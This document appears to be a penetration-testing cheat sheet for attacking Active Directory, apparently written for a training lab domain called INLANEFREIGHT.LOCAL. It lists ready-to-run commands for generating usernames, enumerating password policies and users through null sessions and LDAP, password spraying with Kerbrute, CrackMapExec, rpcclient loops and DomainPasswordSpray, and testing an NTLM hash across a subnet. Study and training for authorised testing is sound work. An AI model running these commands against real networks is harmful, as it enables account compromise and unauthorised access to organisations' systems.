Password Spraying & Password Policies
Username Generation
Username Generation Script
Command:
#!/bin/bash
# Emit every 4-character string over A-Z and 0-9 via nested brace expansion
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}
do
    echo "$x"
done
Result: Generates 16,079,616 possible username combinations from a Linux-based host.
Password Policy Enumeration
CrackMapExec - Password Policy
Command:
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --passpol
Result: Enumerates the password policy using CrackMapExec.
rpcclient - Null Session Enumeration
Command:
rpcclient -U "" -N 172.16.5.5
Result: Opens an SMB NULL session (empty username, no password) from which domain information can then be queried.
rpcclient - Query Domain Information
Command:
rpcclient $> querydominfo
Result: Retrieves domain password policy details.
enum4linux - Password Policy
Command:
enum4linux -P 172.16.5.5
Result: Enumerates the password policy using enum4linux.
enum4linux-ng - Password Policy & Output Save
Command:
enum4linux-ng -P 172.16.5.5 -oA ilfreight
Result: Enumerates password policy and saves output in YAML & JSON formats.
ldapsearch - Password Policy Enumeration
Command:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Result: Retrieves password policy settings from a Windows domain.
net accounts - Windows Domain Password Policy
Command:
net accounts
Result: Enumerates the password policy on a Windows domain.
PowerView - Import Module
Command:
Import-Module .\PowerView.ps1
Result: Loads the PowerView module for Active Directory enumeration.
PowerView - Get Domain Policy
Command:
Get-DomainPolicy
Result: Retrieves domain password policy settings.
User Enumeration
enum4linux - User Enumeration
Command:
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Result: Lists users in a Windows domain.
rpcclient - Enumerate Domain Users
Command:
rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
Result: Enumerates domain users via rpcclient.
CrackMapExec - User Enumeration
Command:
crackmapexec smb 172.16.5.5 --users
Result: Lists users in the Windows domain.
ldapsearch - User Enumeration
Command:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Result: Retrieves usernames from Active Directory.
windapsearch - User Enumeration
Command:
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Result: Lists users in the target Windows domain.
Password Spraying Attacks
rpcclient - Password Spraying
Command:
for u in $(cat valid_users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Result: Performs a password spraying attack using rpcclient.
Kerbrute - Password Spraying
Command:
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
Result: Conducts a Kerberos-based password spraying attack.
CrackMapExec - Password Spraying
Command:
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
Result: Performs a password spraying attack and filters successful attempts.
CrackMapExec - Credential Validation
Command:
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
Result: Checks if provided credentials are valid.
CrackMapExec - Local Authentication Password Check
Command:
sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
Result: Tests a local administrator NTLM hash across the subnet using local (non-domain) authentication; local-account attempts are not counted against the domain lockout policy.
PowerShell - Import DomainPasswordSpray
Command:
Import-Module .\DomainPasswordSpray.ps1
Result: Loads the DomainPasswordSpray PowerShell tool.
PowerShell - Execute Password Spraying
Command:
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
Result: Runs a password spraying attack and saves results to a file.